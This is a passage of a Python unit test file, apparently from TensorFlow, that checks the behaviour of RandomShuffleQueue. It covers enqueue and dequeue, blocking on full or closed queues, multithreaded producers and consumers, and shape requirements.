q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
        # While the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
      # elements, and is blocked waiting for one more element to be dequeued.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
